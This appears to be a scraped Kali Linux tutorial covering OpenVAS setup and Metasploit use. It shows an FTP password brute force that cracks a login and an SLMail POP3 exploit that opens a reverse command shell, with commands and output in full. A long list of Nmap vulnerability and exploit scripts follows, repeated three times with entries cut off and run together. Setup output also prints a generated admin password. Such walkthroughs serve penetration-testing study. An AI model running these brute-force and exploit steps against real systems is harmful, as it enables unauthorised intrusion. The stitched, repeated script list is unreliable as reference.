The Open Vulnerability Assessment System (OpenVAS) is a framework of several services and tools offering a comprehensive and powerful vulnerability scanning and vulnerability management solution.
The actual security scanner is accompanied with a daily updated feed of Network Vulnerability Tests (NVTs), over 33,000 in total (as of December 2013).
Related Articles
All OpenVAS products are Free Software. Most components are licensed under the GNU General Public License (GNU GPL).
root@kali:~# apt-get update
root@kali:~# apt-get dist-upgrade
root@kali:~# apt-get install openvas
root@kali:~# openvas-setup
/var/lib/openvas/private/CA created
/var/lib/openvas/CA created
[i] This script synchronizes an NVT collection with the ‘OpenVAS NVT Feed’.
[i] Online information about this feed: ‘http://www.openvas.org/openvas-nvt-feed
…
sent 1143 bytes received 681741238 bytes 1736923.26 bytes/sec
total size is 681654050 speedup is 1.00
[i] Initializing scap database
[i] Updating CPEs
[i] Updating /var/lib/openvas/scap-data/nvdcve-2.0-2002.xml
[i] Updating /var/lib/openvas/scap-data/nvdcve-2.0-2003.xml
…
Write out database with 1 new entries
Data Base Updated
Restarting Greenbone Security Assistant: gsad.
User created with password ‘6062d074-0a4c-4de1-a26a-5f9f055b7c88’.
root@kali:~# openvas-start
Starting OpenVas Services
Starting Greenbone Security Assistant: gsad.
Starting OpenVAS Scanner: openvassd.
Starting OpenVAS Manager: openvasmd.
root@kali:~# systemctl start postgresql
To have this service start at boot time, enable it using systemctl as follows:
root@kali:~# systemctl enable postgresql
root@kali:~# msfconsole
=[ metasploit v4.5.3-2013040301 [core:4.5 api:1.0]
+ — –=[ 1084 exploits – 675 auxiliary – 181 post
+ — –=[ 277 payloads – 29 encoders – 8 nops
msf > show -h
[*] Valid parameters for the “show” command are: all, encoders, nops, exploits,
payloads, auxiliary, plugins, options
msf > show auxiliary
msf> use auxiliary/scanner/snmp/snmp_enum
msf auxiliary(snmp_enum) > info
Name: SNMP Enumeration Module
Module: auxiliary/scanner/snmp/snmp_enum
msf auxiliary(snmp_enum) > show options
Module options (auxiliary/scanner/snmp/snmp_enum):
msf auxiliary(snmp_enum) >
root@kali:~# msfconsole -q
msf> search type:auxiliary login
msf> use auxiliary/scanner/ftp/ftp_login
msf auxiliary(ftp_login) > show options
msf auxiliary(ftp_login) > set PASS_FILE /root/password-file.txt
msf auxiliary(ftp_login) > set USERPASS_FILE /root/users.txt
msf auxiliary(ftp_login) > set RHOSTS 192.168.11.219
msf auxiliary(ftp_login) > run
*] Connecting to FTP server 192.168.11.219:21…
[*] Connected to target FTP server.
[*] 192.168.11.219:21 FTP – [003/341] – Failed FTP login for ‘mike’:”
[*] 192.168.11.219:21 FTP – [004/341] – Attempting FTP login for ‘ubuntu’:”
[*] 192.168.11.219:21 FTP – [004/341] – Failed FTP login for ‘ubuntu’:”
[*] 192.168.11.219:21 FTP – [005/341] – Attempting FTP login for ‘root’:’root’
[*] 192.168.11.219:21 FTP – [005/341] – Failed FTP login for ‘root’:’root’
[*] 192.168.11.219:21 FTP – [006/341] – Attempting FTP login for ‘bob’:’bob’
[-] 192.168.11.219:21 FTP – [006/341] – Caught EOFError, reconnecting
[*] Connecting to FTP server 192.168.11.219:21…
[*] Connected to target FTP server.
[*] 192.168.11.219:21 FTP – [006/341] – Failed FTP login for ‘bob’:’bob’
[*] 192.168.11.219:21 FTP – [007/341] – Attempting FTP login for ‘mike’:’mike’
[*] 192.168.11.219:21 FTP – [007/341] – Failed FTP login for ‘mike’:’mike’
[*] 192.168.11.219:21 FTP – [008/341] – Attempting login for ‘ubuntu’:’ubuntu’
[+] 192.168.11.219:21 – Successful FTP login for ‘ubuntu’:’ubuntu’
[*] 192.168.11.219:21 – User ‘ubuntu’ has READ/WRITE access
root@kali:~# msfconsole
=[ metasploit v4.5.3-2013040301 [core:4.5 api:1.0]
+ — –=[ 1084 exploits – 675 auxiliary – 181 post
+ — –=[ 277 payloads – 29 encoders – 8 nops
msf > search pop3
msf > use exploit/windows/pop3/seattlelab_pass
msf exploit(seattlelab_pass) > show options
msf exploit(seattlelab_pass) > info
Module options (exploit/windows/pop3/seattlelab_pass):
Current Setting Required Description
—- ————— ——– ———–
yes The target address
yes The target port
msf exploit(seattlelab_pass) > exploit
[*] Started reverse handler on 192.168.10.5:4444
[*] Trying Windows NT/2000/XP/2003 (SLMail 5.5) using jmp esp at 5f4a358f
[*] Command shell session 1 opened (192.168.10.5:4444 -> 192.168.11.35:49161)
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.
All rights reserved.
C:\Program Files\SLmail\System>
Scripts
afp-path-vuln
Detects the Mac OS X AFP directory traversal vulnerability, CVE-2010-0533.
broadcast-avahi-dos
Attempts to discover hosts in the local network using the DNS Service Discovery protocol and sends a NULL UDP packet to each host to test if it is Vulnerable to the Avahi NULL UDP packet denial of service (CVE-2011-1002).
clamav-exec
Exploits ClamAV servers vulnerable to unauthenticated clamav comand execution.
distcc-cve2004-2687
Detects and exploits a Remote Code Execution vulnerability in the distributed compiler daemon distcc. The vulnerability was disclosed in 2002, but is still present in modern implementation due to poor configuration of the service.
dns-update
Attempts to perform a dynamic DNS update without authentication.
firewall-bypass
Detects a vulnerability in netfilter and other firewalls that use helpers to dynamically open ports for protocols such as ftp and sip.
ftp-libopie
Checks if an FTPd is prone to CVE-2010-1938 (OPIE off-by-one stack overflow), a vulnerability discovered by Maksymilian Arciemowicz and Adam “pi3” Zabrocki. See the advisory at https://nmap.org/r/fbsd-sa-opie. Be advised that, if launched against a vulnerable host, this script will crash the FTPd.
ftp-proftpd-backdoor
Tests for the presence of the ProFTPD 1.3.3c backdoor reported as OSVDB-ID 69562. This script attempts to exploit the backdoor using the innocuous id command by default, but that can be changed with the ftp-proftpd-backdoor.cmd script argument.
ftp-vsftpd-backdoor
Tests for the presence of the vsFTPd 2.3.4 backdoor reported on 2011-07-04 (CVE-2011-2523). This script attempts to exploit the backdoor using the innocuous id command by default, but that can be changed with the exploit.cmd or ftp-vsftpd-backdoor.cmd script arguments.
ftp-vuln-cve2010-4221
Checks for a stack-based buffer overflow in the ProFTPD server, version between 1.3.2rc3 and 1.3.3b. By sending a large number of TELNET_IAC escape sequence, the proftpd process miscalculates the buffer length, and a remote attacker will be able to corrupt the stack and execute arbitrary code within the context of the proftpd process (CVE-2010-4221). Authentication is not required to exploit this vulnerability.
http-adobe-coldfusion-apsa1301
Attempts to exploit an authentication bypass vulnerability in Adobe Coldfusion servers to retrieve a valid administrator’s session cookie.
http-aspnet-debug
Determines if a ASP.NET application has debugging enabled using a HTTP DEBUG request.
http-avaya-ipoffice-users
Attempts to enumerate users in Avaya IP Office systems 7.x.
http-awstatstotals-exec
Exploits a remote code execution vulnerability in Awstats Totals 1.0 up to 1.14 and possibly other products based on it (CVE: 2008-3922).
http-axis2-dir-traversal
Exploits a directory traversal vulnerability in Apache Axis2 version 1.4.1 by sending a specially crafted request to the parameter xsd (OSVDB-59001). By default it will try to retrieve the configuration file of the Axis2 service ‘/conf/axis2.xml’ using the path ‘/axis2/services/’ to return the username and password of the admin account.
http-cookie-flags
Examines cookies set by HTTP services. Reports any session cookies set without the httponly flag. Reports any session cookies set over SSL without the secure flag. If http-enum.nse is also run, any interesting paths found by it will be checked in addition to the root.
http-cross-domain-policy
Checks the cross-domain policy file (/crossdomain.xml) and the client-acces-policy file (/clientaccesspolicy.xml) in web applications and lists the trusted domains. Overly permissive settings enable Cross Site Request Forgery attacks and may allow attackers to access sensitive data. This script is useful to detect permissive configurations and possible domain names available for purchase to exploit the application.
http-csrf
This script detects Cross Site Request Forgeries (CSRF) vulnerabilities.
http-dlink-backdoor
Detects a firmware backdoor on some D-Link routers by changing the User-Agent to a “secret” value. Using the “secret” User-Agent bypasses authentication and allows admin access to the router.
http-dombased-xss
It looks for places where attacker-controlled information in the DOM may be used to affect JavaScript execution in certain ways. The attack is explained here: http://www.webappsec.org/projects/articles/071105.shtml
http-enum
Enumerates directories used by popular web applications and servers.
http-fileupload-exploiter
Exploits insecure file upload forms in web applications using various techniques like changing the Content-type header or creating valid image files containing the payload in the comment.
http-frontpage-login
Checks whether target machines are vulnerable to anonymous Frontpage login.
http-git
Checks for a Git repository found in a website’s document root /.git/
http-huawei-hg5xx-vuln
Detects Huawei modems models HG530x, HG520x, HG510x (and possibly others…) vulnerable to a remote credential and information disclosure vulnerability. It also extracts the PPPoE credentials and other interesting configuration values.
http-iis-webdav-vuln
Checks for a vulnerability in IIS 5.1/6.0 that allows arbitrary users to access secured WebDAV folders by searching for a password-protected folder and attempting to access it. This vulnerability was patched in Microsoft Security Bulletin MS09-020, https://nmap.org/r/ms09-020.
http-internal-ip-disclosure
Determines if the web server leaks its internal IP address when sending an HTTP/1.0 request without a Host header.
http-litespeed-sourcecode-download
Exploits a null-byte poisoning vulnerability in Litespeed Web Servers 4.0.x before 4.0.15 to retrieve the target script’s source code by sending a HTTP request with a null byte followed by a .txt file extension (CVE-2010-2333).
http-majordomo2-dir-traversal
Exploits a directory traversal vulnerability existing in Majordomo2 to retrieve remote files. (CVE-2011-0049).
http-method-tamper
Attempts to bypass password protected resources (HTTP 401 status) by performing HTTP verb tampering. If an array of paths to check is not set, it will crawl the web server and perform the check against any password protected resource that it finds.
http-passwd
Checks if a web server is vulnerable to directory traversal by attempting to retrieve /etc/passwd or \boot.ini.
http-phpmyadmin-dir-traversal
Exploits a directory traversal vulnerability in phpMyAdmin 2.6.4-pl1 (and possibly other versions) to retrieve remote files on the web server.
http-phpself-xss
Crawls a web server and attempts to find PHP files vulnerable to reflected cross site scripting via the variable $_SERVER[“PHP_SELF”].
http-shellshock
Attempts to exploit the “shellshock” vulnerability (CVE-2014-6271 and CVE-2014-7169) in web applications.
http-slowloris-check
Tests a web server for vulnerability to the Slowloris DoS attack without actually launching a DoS attack.
http-sql-injection
Spiders an HTTP server looking for URLs containing queries vulnerable to an SQL injection attack. It also extracts forms from found websites and tries to identify fields that are vulnerable.
http-stored-xss
Unfiltered ‘>’ (greater than sign). An indication of potential XSS vulnerability.
http-tplink-dir-traversal
Exploits a directory traversal vulnerability existing in several TP-Link wireless routers. Attackers may exploit this vulnerability to read any of the configuration and password files remotely and without authentication.
http-trace
Sends an HTTP TRACE request and shows if the method TRACE is enabled. If debug is enabled, it returns the header fields that were modified in the response.
http-vmware-path-vuln
Checks for a path-traversal vulnerability in VMWare ESX, ESXi, and Server (CVE-2009-3733).
http-vuln-cve2006-3392
Exploits a file disclosure vulnerability in Webmin (CVE-2006-3392)
http-vuln-cve2010-0738
Tests whether a JBoss target is vulnerable to jmx console authentication bypass (CVE-2010-0738).
http-vuln-cve2010-2861
Executes a directory traversal attack against a ColdFusion server and tries to grab the password hash for the administrator user. It then uses the salt value (hidden in the web page) to create the SHA1 HMAC hash that the web server needs for authentication as admin. You can pass this value to the ColdFusion server as the admin without cracking the password hash.
http-vuln-cve2011-3192
Detects a denial of service vulnerability in the way the Apache web server handles requests for multiple overlapping/simple ranges of a page.
http-vuln-cve2011-3368
Tests for the CVE-2011-3368 (Reverse Proxy Bypass) vulnerability in Apache HTTP server’s reverse proxy mode. The script will run 3 tests:
the loopback test, with 3 payloads to handle different rewrite rules
the internal hosts test. According to Contextis, we expect a delay before a server error.
The external website test. This does not mean that you can reach a LAN ip, but this is a relevant issue anyway.
http-vuln-cve2012-1823
Detects PHP-CGI installations that are vulnerable to CVE-2012-1823, This critical vulnerability allows attackers to retrieve source code and execute code remotely.
http-vuln-cve2013-0156
Detects Ruby on Rails servers vulnerable to object injection, remote command executions and denial of service attacks. (CVE-2013-0156)
http-vuln-cve2013-6786
Detects a URL redirection and reflected XSS vulnerability in Allegro RomPager Web server. The vulnerability has been assigned CVE-2013-6786.
http-vuln-cve2013-7091
An 0 day was released on the 6th December 2013 by rubina119, and was patched in Zimbra 7.2.6.
http-vuln-cve2014-2126
Detects whether the Cisco ASA appliance is vulnerable to the Cisco ASA ASDM Privilege Escalation Vulnerability (CVE-2014-2126).
http-vuln-cve2014-2127
Detects whether the Cisco ASA appliance is vulnerable to the Cisco ASA SSL VPN Privilege Escalation Vulnerability (CVE-2014-2127).
http-vuln-cve2014-2128
Detects whether the Cisco ASA appliance is vulnerable to the Cisco ASA SSL VPN Authentication Bypass Vulnerability (CVE-2014-2128).
http-vuln-cve2014-2129
Detects whether the Cisco ASA appliance is vulnerable to the Cisco ASA SIP Denial of Service Vulnerability (CVE-2014-2129).
http-vuln-cve2014-3704
Exploits CVE-2014-3704 also known as ‘Drupageddon’ in Drupal. Versions
Exploits a remote code injection vulnerability (CVE-2014-8877) in WordPress CM Download Manager plugin. Versions http-vuln-cve2015-1427
Scripts
afp-path-vuln
Detects the Mac OS X AFP directory traversal vulnerability, CVE-2010-0533.
broadcast-avahi-dos
Attempts to discover hosts in the local network using the DNS Service Discovery protocol and sends a NULL UDP packet to each host to test if it is vulnerable to the Avahi NULL UDP packet denial of service (CVE-2011-1002).
clamav-exec
Exploits ClamAV servers vulnerable to unauthenticated clamav comand execution.
distcc-cve2004-2687
Detects and exploits a remote code execution vulnerability in the distributed compiler daemon distcc. The vulnerability was disclosed in 2002, but is still present in modern implementation due to poor configuration of the service.
dns-update
Attempts to perform a dynamic DNS update without authentication.
firewall-bypass
Detects a vulnerability in netfilter and other firewalls that use helpers to dynamically open ports for protocols such as ftp and sip.
ftp-libopie
Checks if an FTPd is prone to CVE-2010-1938 (OPIE off-by-one stack overflow), a vulnerability discovered by Maksymilian Arciemowicz and Adam “pi3” Zabrocki. See the advisory at https://nmap.org/r/fbsd-sa-opie. Be advised that, if launched against a vulnerable host, this script will crash the FTPd.
ftp-proftpd-backdoor
Tests for the presence of the ProFTPD 1.3.3c backdoor reported as OSVDB-ID 69562. This script attempts to exploit the backdoor using the innocuous id command by default, but that can be changed with the ftp-proftpd-backdoor.cmd script argument.
ftp-vsftpd-backdoor
Tests for the presence of the vsFTPd 2.3.4 backdoor reported on 2011-07-04 (CVE-2011-2523). This script attempts to exploit the backdoor using the innocuous id command by default, but that can be changed with the exploit.cmd or ftp-vsftpd-backdoor.cmd script arguments.
ftp-vuln-cve2010-4221
Checks for a stack-based buffer overflow in the ProFTPD server, version between 1.3.2rc3 and 1.3.3b. By sending a large number of TELNET_IAC escape sequence, the proftpd process miscalculates the buffer length, and a remote attacker will be able to corrupt the stack and execute arbitrary code within the context of the proftpd process (CVE-2010-4221). Authentication is not required to exploit this vulnerability.
http-adobe-coldfusion-apsa1301
Attempts to exploit an authentication bypass vulnerability in Adobe Coldfusion servers to retrieve a valid administrator’s session cookie.
http-aspnet-debug
Determines if a ASP.NET application has debugging enabled using a HTTP DEBUG request.
http-avaya-ipoffice-users
Attempts to enumerate users in Avaya IP Office systems 7.x.
http-awstatstotals-exec
Exploits a remote code execution vulnerability in Awstats Totals 1.0 up to 1.14 and possibly other products based on it (CVE: 2008-3922).
http-axis2-dir-traversal
Exploits a directory traversal vulnerability in Apache Axis2 version 1.4.1 by sending a specially crafted request to the parameter xsd (OSVDB-59001). By default it will try to retrieve the configuration file of the Axis2 service ‘/conf/axis2.xml’ using the path ‘/axis2/services/’ to return the username and password of the admin account.
http-cookie-flags
Examines cookies set by HTTP services. Reports any session cookies set without the httponly flag. Reports any session cookies set over SSL without the secure flag. If http-enum.nse is also run, any interesting paths found by it will be checked in addition to the root.
http-cross-domain-policy
Checks the cross-domain policy file (/crossdomain.xml) and the client-acces-policy file (/clientaccesspolicy.xml) in web applications and lists the trusted domains. Overly permissive settings enable Cross Site Request Forgery attacks and may allow attackers to access sensitive data. This script is useful to detect permissive configurations and possible domain names available for purchase to exploit the application.
http-csrf
This script detects Cross Site Request Forgeries (CSRF) vulnerabilities.
http-dlink-backdoor
Detects a firmware backdoor on some D-Link routers by changing the User-Agent to a “secret” value. Using the “secret” User-Agent bypasses authentication and allows admin access to the router.
http-dombased-xss
It looks for places where attacker-controlled information in the DOM may be used to affect JavaScript execution in certain ways. The attack is explained here: http://www.webappsec.org/projects/articles/071105.shtml
http-enum
Enumerates directories used by popular web applications and servers.
http-fileupload-exploiter
Exploits insecure file upload forms in web applications using various techniques like changing the Content-type header or creating valid image files containing the payload in the comment.
http-frontpage-login
Checks whether target machines are vulnerable to anonymous Frontpage login.
http-git
Checks for a Git repository found in a website’s document root /.git/
http-huawei-hg5xx-vuln
Detects Huawei modems models HG530x, HG520x, HG510x (and possibly others…) vulnerable to a remote credential and information disclosure vulnerability. It also extracts the PPPoE credentials and other interesting configuration values.
http-iis-webdav-vuln
Checks for a vulnerability in IIS 5.1/6.0 that allows arbitrary users to access secured WebDAV folders by searching for a password-protected folder and attempting to access it. This vulnerability was patched in Microsoft Security Bulletin MS09-020, https://nmap.org/r/ms09-020.
http-internal-ip-disclosure
Determines if the web server leaks its internal IP address when sending an HTTP/1.0 request without a Host header.
http-litespeed-sourcecode-download
Exploits a null-byte poisoning vulnerability in Litespeed Web Servers 4.0.x before 4.0.15 to retrieve the target script’s source code by sending a HTTP request with a null byte followed by a .txt file extension (CVE-2010-2333).
http-majordomo2-dir-traversal
Exploits a directory traversal vulnerability existing in Majordomo2 to retrieve remote files. (CVE-2011-0049).
http-method-tamper
Attempts to bypass password protected resources (HTTP 401 status) by performing HTTP verb tampering. If an array of paths to check is not set, it will crawl the web server and perform the check against any password protected resource that it finds.
http-passwd
Checks if a web server is vulnerable to directory traversal by attempting to retrieve /etc/passwd or \boot.ini.
http-phpmyadmin-dir-traversal
Exploits a directory traversal vulnerability in phpMyAdmin 2.6.4-pl1 (and possibly other versions) to retrieve remote files on the web server.
http-phpself-xss
Crawls a web server and attempts to find PHP files vulnerable to reflected cross site scripting via the variable $_SERVER[“PHP_SELF”].
http-shellshock
Attempts to exploit the “shellshock” vulnerability (CVE-2014-6271 and CVE-2014-7169) in web applications.
http-slowloris-check
Tests a web server for vulnerability to the Slowloris DoS attack without actually launching a DoS attack.
http-sql-injection
Spiders an HTTP server looking for URLs containing queries vulnerable to an SQL injection attack. It also extracts forms from found websites and tries to identify fields that are vulnerable.
http-stored-xss
Unfiltered ‘>’ (greater than sign). An indication of potential XSS vulnerability.
http-tplink-dir-traversal
Exploits a directory traversal vulnerability existing in several TP-Link wireless routers. Attackers may exploit this vulnerability to read any of the configuration and password files remotely and without authentication.
http-trace
Sends an HTTP TRACE request and shows if the method TRACE is enabled. If debug is enabled, it returns the header fields that were modified in the response.
http-vmware-path-vuln
Checks for a path-traversal vulnerability in VMWare ESX, ESXi, and Server (CVE-2009-3733).
http-vuln-cve2006-3392
Exploits a file disclosure vulnerability in Webmin (CVE-2006-3392)
http-vuln-cve2010-0738
Tests whether a JBoss target is vulnerable to jmx console authentication bypass (CVE-2010-0738).
http-vuln-cve2010-2861
Executes a directory traversal attack against a ColdFusion server and tries to grab the password hash for the administrator user. It then uses the salt value (hidden in the web page) to create the SHA1 HMAC hash that the web server needs for authentication as admin. You can pass this value to the ColdFusion server as the admin without cracking the password hash.
http-vuln-cve2011-3192
Detects a denial of service vulnerability in the way the Apache web server handles requests for multiple overlapping/simple ranges of a page.
http-vuln-cve2011-3368
Tests for the CVE-2011-3368 (Reverse Proxy Bypass) vulnerability in Apache HTTP server’s reverse proxy mode. The script will run 3 tests:
the loopback test, with 3 payloads to handle different rewrite rules
the internal hosts test. According to Contextis, we expect a delay before a server error.
The external website test. This does not mean that you can reach a LAN ip, but this is a relevant issue anyway.
http-vuln-cve2012-1823
Detects PHP-CGI installations that are vulnerable to CVE-2012-1823, This critical vulnerability allows attackers to retrieve source code and execute code remotely.
http-vuln-cve2013-0156
Detects Ruby on Rails servers vulnerable to object injection, remote command executions and denial of service attacks. (CVE-2013-0156)
http-vuln-cve2013-6786
Detects a URL redirection and reflected XSS vulnerability in Allegro RomPager Web server. The vulnerability has been assigned CVE-2013-6786.
http-vuln-cve2013-7091
An 0 day was released on the 6th December 2013 by rubina119, and was patched in Zimbra 7.2.6.
http-vuln-cve2014-2126
Detects whether the Cisco ASA appliance is vulnerable to the Cisco ASA ASDM Privilege Escalation Vulnerability (CVE-2014-2126).
http-vuln-cve2014-2127
Detects whether the Cisco ASA appliance is vulnerable to the Cisco ASA SSL VPN Privilege Escalation Vulnerability (CVE-2014-2127).
http-vuln-cve2014-2128
Detects whether the Cisco ASA appliance is vulnerable to the Cisco ASA SSL VPN Authentication Bypass Vulnerability (CVE-2014-2128).
http-vuln-cve2014-2129
Detects whether the Cisco ASA appliance is vulnerable to the Cisco ASA SIP Denial of Service Vulnerability (CVE-2014-2129).
http-vuln-cve2014-3704
Exploits CVE-2014-3704 also known as ‘Drupageddon’ in Drupal. Versions
Exploits a remote code injection vulnerability (CVE-2014-8877) in WordPress CM Download Manager plugin. Versions http-vuln-cve2015-1427
This script attempts to detect a vulnerability, CVE-2015-1427, which allows attackers to leverage features of this API to gain unauthenticated remote code execution (RCE).
http-vuln-cve2015-1635
Checks for a remote code execution vulnerability (MS15-034) in Microsoft Windows systems (CVE2015-2015-1635).
http-vuln-cve2017-5638
Detects whether the specified URL is vulnerable to the Apache Struts Remote Code Execution Vulnerability (CVE-2017-5638).
http-vuln-misfortune-cookie
Detects the RomPager 4.07 Misfortune Cookie vulnerability by safely exploiting it.
http-vuln-wnr1000-creds
A vulnerability has been discovered in WNR 1000 series that allows an attacker to retrieve administrator credentials with the router interface. Tested On Firmware Version(s): V1.0.2.60_60.0.86 (Latest) and V1.0.2.54_60.0.82NA
http-wordpress-users
Enumerates usernames in WordPress blog/CMS installations by exploiting an information disclosure vulnerability existing in versions 2.6, 3.1, 3.1.1, 3.1.3 and 3.2-beta2 and possibly others.
ipmi-cipher-zero
IPMI 2.0 Cipher Zero Authentication Bypass Scanner. This module identifies IPMI 2.0 compatible systems that are vulnerable to an authentication bypass vulnerability through the use of cipher zero.
irc-botnet-channels
Checks an IRC server for channels that are commonly used by malicious botnets.
irc-unrealircd-backdoor
Checks if an IRC server is backdoored by running a time-based command (ping) and checking how long it takes to respond.
mysql-vuln-cve2012-2122
netbus-auth-bypass
Checks if a NetBus server is vulnerable to an authentication bypass vulnerability which allows full access without knowing the password.
qconn-exec
Attempts to identify whether a listening QNX QCONN daemon allows unauthenticated users to execute arbitrary operating system commands.
rdp-vuln-ms12-020
Checks if a machine is vulnerable to MS12-020 RDP vulnerability.
realvnc-auth-bypass
Checks if a VNC server is vulnerable to the RealVNC authentication bypass (CVE-2006-2369).
rmi-vuln-classloader
Tests whether Java rmiregistry allows class loading. The default configuration of rmiregistry allows loading classes from remote URLs, which can lead to remote code execution. The vendor (Oracle/Sun) classifies this as a design feature.
samba-vuln-cve-2012-1182
Checks if target machines are vulnerable to the Samba heap overflow vulnerability CVE-2012-1182.
smb-vuln-conficker
Detects Microsoft Windows systems infected by the Conficker worm. This check is dangerous and it may crash systems.
smb-vuln-cve2009-3103
Detects Microsoft Windows systems vulnerable to denial of service (CVE-2009-3103). This script will crash the service if it is vulnerable.
smb-vuln-ms06-025
Detects Microsoft Windows systems with Ras RPC service vulnerable to MS06-025.
smb-vuln-ms07-029
Detects Microsoft Windows systems with Dns Server RPC vulnerable to MS07-029.
smb-vuln-ms08-067
Detects Microsoft Windows systems vulnerable to the remote code execution vulnerability known as MS08-067. This check is dangerous and it may crash systems.smb-vuln-ms10-054
Tests whether target machines are vulnerable to the ms10-054 SMB remote memory corruption vulnerability.
smb-vuln-ms10-061
Tests whether target machines are vulnerable to ms10-061 Printer Spooler impersonation vulnerability.
smb-vuln-regsvc-dos
Checks if a Microsoft Windows 2000 system is vulnerable to a crash in regsvc caused by a null pointer dereference. This check will crash the service if it is vulnerable and requires a guest account or higher to work.
smtp-vuln-cve2010-4344
Checks for and/or exploits a heap overflow within versions of Exim prior to version 4.69 (CVE-2010-4344) and a privilege escalation vulnerability in Exim 4.72 and prior (CVE-2010-4345).
smtp-vuln-cve2011-1720
Checks for a memory corruption in the Postfix SMTP server when it uses Cyrus SASL library authentication mechanisms (CVE-2011-1720). This vulnerability can allow denial of service and possibly remote code execution.
smtp-vuln-cve2011-1764
Checks for a format string vulnerability in the Exim SMTP server (version 4.70 through 4.75) with DomainKeys Identified Mail (DKIM) support (CVE-2011-1764). The DKIM logging mechanism did not use format string specifiers when logging some parts of the DKIM-Signature header field. A remote attacker who is able to send emails, can exploit this vulnerability and execute arbitrary code with the privileges of the Exim daemon.
ssl-ccs-injection
Detects whether a server is vulnerable to the SSL/TLS “CCS Injection” vulnerability (CVE-2014-0224), first discovered by Masashi Kikuchi. The script is based on the ccsinjection.c code authored by Ramon de C Valle (https://gist.github.com/rcvalle/71f4b027d61a78c42607)
ssl-cert-intaddr
Reports any private (RFC1918) IPv4 addresses found in the various fields of an SSL service’s certificate. These will only be reported if the target address itself is not private. Nmap v7.30 or later is required.
ssl-dh-params
Weak ephemeral Diffie-Hellman parameter detection for SSL/TLS services.
ssl-heartbleed
Detects whether a server is vulnerable to the OpenSSL Heartbleed bug (CVE-2014-0160). The code is based on the Python script ssltest.py authored by Jared Stafford ([email protected])
ssl-known-key
Checks whether the SSL certificate used by a host has a fingerprint that matches an included database of problematic keys.
ssl-poodle
Checks whether SSLv3 CBC ciphers are allowed (POODLE)
sslv2-drown
Determines whether the server supports SSLv2, what ciphers it supports and tests for CVE-2015-3197, CVE-2016-0703 and CVE-2016-0800 (DROWN)
supermicro-ipmi-conf
Attempts to download an unprotected configuration file containing plain-text user credentials in vulnerable Supermicro Onboard IPMI controllers.
tls-ticketbleed
Detects whether a server is vulnerable to the F5 Ticketbleed bug (CVE-2016-9244).
wdb-version
Detects vulnerabilities and gathers information (such as version numbers and hardware support) from VxWorks Wind DeBug agents.
This script attempts to detect a vulnerability, CVE-2015-1427, which allows attackers to leverage features of this API to gain unauthenticated remote code execution (RCE).
http-vuln-cve2015-1635
Checks for a remote code execution vulnerability (MS15-034) in Microsoft Windows systems (CVE2015-2015-1635).
http-vuln-cve2017-5638
Detects whether the specified URL is vulnerable to the Apache Struts Remote Code Execution Vulnerability (CVE-2017-5638).
http-vuln-misfortune-cookie
Detects the RomPager 4.07 Misfortune Cookie vulnerability by safely exploiting it.
http-vuln-wnr1000-creds
A vulnerability has been discovered in WNR 1000 series that allows an attacker to retrieve administrator credentials with the router interface. Tested On Firmware Version(s): V1.0.2.60_60.0.86 (Latest) and V1.0.2.54_60.0.82NA
http-wordpress-users
Enumerates usernames in WordPress blog/CMS installations by exploiting an information disclosure vulnerability existing in versions 2.6, 3.1, 3.1.1, 3.1.3 and 3.2-beta2 and possibly others.
ipmi-cipher-zero
IPMI 2.0 Cipher Zero Authentication Bypass Scanner. This module identifies IPMI 2.0 compatible systems that are vulnerable to an authentication bypass vulnerability through the use of cipher zero.
irc-botnet-channels
Checks an IRC server for channels that are commonly used by malicious botnets.
irc-unrealircd-backdoor
Checks if an IRC server is backdoored by running a time-based command (ping) and checking how long it takes to respond.
mysql-vuln-cve2012-2122
netbus-auth-bypass
Checks if a NetBus server is vulnerable to an authentication bypass vulnerability which allows full access without knowing the password.
qconn-exec
Scripts
afp-path-vuln
Detects the Mac OS X AFP directory traversal vulnerability, CVE-2010-0533.
broadcast-avahi-dos
Attempts to discover hosts in the local network using the DNS Service Discovery protocol and sends a NULL UDP packet to each host to test if it is vulnerable to the Avahi NULL UDP packet denial of service (CVE-2011-1002).
clamav-exec
Exploits ClamAV servers vulnerable to unauthenticated clamav comand execution.
distcc-cve2004-2687
Detects and exploits a remote code execution vulnerability in the distributed compiler daemon distcc. The vulnerability was disclosed in 2002, but is still present in modern implementation due to poor configuration of the service.
dns-update
Attempts to perform a dynamic DNS update without authentication.
firewall-bypass
Detects a vulnerability in netfilter and other firewalls that use helpers to dynamically open ports for protocols such as ftp and sip.
ftp-libopie
Checks if an FTPd is prone to CVE-2010-1938 (OPIE off-by-one stack overflow), a vulnerability discovered by Maksymilian Arciemowicz and Adam “pi3” Zabrocki. See the advisory at https://nmap.org/r/fbsd-sa-opie. Be advised that, if launched against a vulnerable host, this script will crash the FTPd.
ftp-proftpd-backdoor
Tests for the presence of the ProFTPD 1.3.3c backdoor reported as OSVDB-ID 69562. This script attempts to exploit the backdoor using the innocuous id command by default, but that can be changed with the ftp-proftpd-backdoor.cmd script argument.
ftp-vsftpd-backdoor
Tests for the presence of the vsFTPd 2.3.4 backdoor reported on 2011-07-04 (CVE-2011-2523). This script attempts to exploit the backdoor using the innocuous id command by default, but that can be changed with the exploit.cmd or ftp-vsftpd-backdoor.cmd script arguments.
ftp-vuln-cve2010-4221
Checks for a stack-based buffer overflow in the ProFTPD server, version between 1.3.2rc3 and 1.3.3b. By sending a large number of TELNET_IAC escape sequence, the proftpd process miscalculates the buffer length, and a remote attacker will be able to corrupt the stack and execute arbitrary code within the context of the proftpd process (CVE-2010-4221). Authentication is not required to exploit this vulnerability.
http-adobe-coldfusion-apsa1301
Attempts to exploit an authentication bypass vulnerability in Adobe Coldfusion servers to retrieve a valid administrator’s session cookie.
http-aspnet-debug
Determines if a ASP.NET application has debugging enabled using a HTTP DEBUG request.
http-avaya-ipoffice-users
Attempts to enumerate users in Avaya IP Office systems 7.x.
http-awstatstotals-exec
Exploits a remote code execution vulnerability in Awstats Totals 1.0 up to 1.14 and possibly other products based on it (CVE: 2008-3922).
http-axis2-dir-traversal
Exploits a directory traversal vulnerability in Apache Axis2 version 1.4.1 by sending a specially crafted request to the parameter xsd (OSVDB-59001). By default it will try to retrieve the configuration file of the Axis2 service ‘/conf/axis2.xml’ using the path ‘/axis2/services/’ to return the username and password of the admin account.
http-cookie-flags
Examines cookies set by HTTP services. Reports any session cookies set without the httponly flag. Reports any session cookies set over SSL without the secure flag. If http-enum.nse is also run, any interesting paths found by it will be checked in addition to the root.
http-cross-domain-policy
